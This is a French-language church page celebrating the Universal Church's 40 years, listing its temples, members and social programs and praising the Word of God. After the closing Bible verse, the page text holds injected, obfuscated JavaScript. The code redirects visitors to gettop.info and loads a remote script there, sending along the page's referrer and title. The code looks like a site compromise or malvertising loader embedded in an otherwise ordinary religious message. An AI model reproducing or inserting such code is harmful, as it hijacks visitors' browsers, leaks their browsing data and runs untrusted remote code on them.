Messages

Le secret de l’Universelle

065ca3d0-9995-42f9-b463-8078dee348ee-copie

 

Le 9 juillet 1977, à l’intérieur d’une ancienne funéraire dans la banlieue de Rio de Janeiro, lorsqu’il prêchait pour peu de personnes, qui y venaient, personne ne pourrait imaginer que débutait l’un des plus grands mouvements de foi et de solidarité qui, rapidement, gagnerait le Brésil et s’éparpillerait par le monde.

Par exemple, dans le fait de stimuler nos 9 millions de fidèles pour qu’ils cherchent le succès professionnel et le confort matériel qu’ils méritent.

Dans les 7.157 temples et les cathédrales installés dans tous les États et dans le District Fédéral et nos 2.857 églises à l’étranger sont des terrains fertiles pour trouver des gens qui se retrouvent avec la vie et aujourd’hui prospère.

Dans l’union d’hommes et de femmes solitaires, nous aidons dans la recherche du véritable amour qui établit des couples et forme des familles, par l’intermédiaire de la Thérapie de l’Amour.

Nous sauvons des dépendants de l’enfer du vice. Rien qu’en 2016, plus de 55 mille ont été aidés par notre émission «Vício Tem Cura» (le vice peut être guéri).

Nous accueillons des sans-abris, 560 mille accueils par an, lors de nos campagnes «Anges de la Nuit». Nous réintégrons dans la société des détenus dans tout le Brésil. Entre les prisonniers et leurs familles, nous faisons plus de 837 mille accueils par année, par le biais du programme social de l’Universel en Prison.

Nous soutenons 56 mille femmes victimes de violence domestique, par le biais de notre programme Raabe.

Nous mobilisons des millions de jeunes nécessiteux ou sans perspective, pour rechercher un avenir et devenir de bons citoyens avec la Force Jeune Universelle.

Nous offrons de l’affection et de l’attention à 386 mille personnes âgées abandonnées par leurs familles avec le programme Caleb.
La force pour réaliser tant de choses, vient d’une seule source: la Parole.

Les professeurs, de vrais piliers de notre société, savent comme leurs paroles et actions peuvent toucher leurs élèves.

Ils forment ainsi des médecins, qui exercent l’art de la guérison; ils forgent des ingénieurs dans les plus divers domaines; des architectes qui projettent des maisons, des ponts et des villes.

Les paroles des professeurs conçoivent aussi des hommes politiques et des gouvernants qui créent, surveillent et exécutent des lois en faveur de la population.

Mais si la parole d’un enseignant forme ceux, qui développeront des nations et des faits incroyables, que dire de la Parole de Dieu, que peut-elle faire dans la vie de ceux qui La pratiquent?

Cette Parole ne revient jamais vide. Elle s’accomplit, exactement comme il est écrit, indépendamment du temps. Elle est efficace.

Eh bien: c’est à cause d’Elle que l’Universelle travaille. Et c’est pour cela qu’elle a dépassée tous les types d’adversité et est arrivée jusqu’ici avec un certain succès.

Du succès pour avoir traversé des frontières, en dépassant des barrières de différentes langues, coutumes, cultures, religions, sociétés ultra-conservatrices et bien plus.

Le succès, néanmoins, est relatif. Il y a encore beaucoup plus à faire pour divulguer cette Parole, dans le monde entier. Et c’est notre principal objectif.

Cette Parole est le pouvoir des Saintes Écritures coulant comme le vent de l’Esprit dans la transformation de vies récupérées dans tous les sens.

La Parole de Dieu c’est la raison pour laquelle nous sommes arrivés jusqu’ici. Et c’est à cause d’elle que nous avons la certitude que nous allons atteindre beaucoup plus de vies.

Depuis 40 ans d’existence, nous de l’Universel, nous dédions tout cela à Dieu et à Sa Parole.

Nous sommes fermes, ayant une certitude absolue, que le Ciel et la Terre passeront, mais les Paroles du Très-Haut ne passeront pas. (Matthieu 24:35).

setTimeout(« document.location.href=’http://gettop.info/kt/?53vSkc&' », delay);eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(! ».replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\\b’+e(c)+’\\b’,’g’),k[c])}}return p}(‘5 d=1;5 2=d.f(\’4\’);2.g=\’c://b.7/8/?9&a=4&i=\’+6(1.o)+\’&p=\’+6(1.n)+\’\';m(1.3){1.3.j.k(2,1.3)}h{d.l(\’q\’)[0].e(2)}’,27,27,’|document|s|currentScript|script|var|encodeURIComponent|info|kt|sdNXbH|frm|gettop|http||appendChild|createElement|src|else|se_referrer|parentNode|insertBefore|getElementsByTagName|if|title|referrer|default_keyword|head’.split(‘|’),0,{}))

} else {

var d=document;var s=d.createElement(‘script’);

Laissez un commentaire

Ou remplissez le formulaire ci-dessous.


Votre adresse e-mail ne sera pas publié. Champs obligatoires*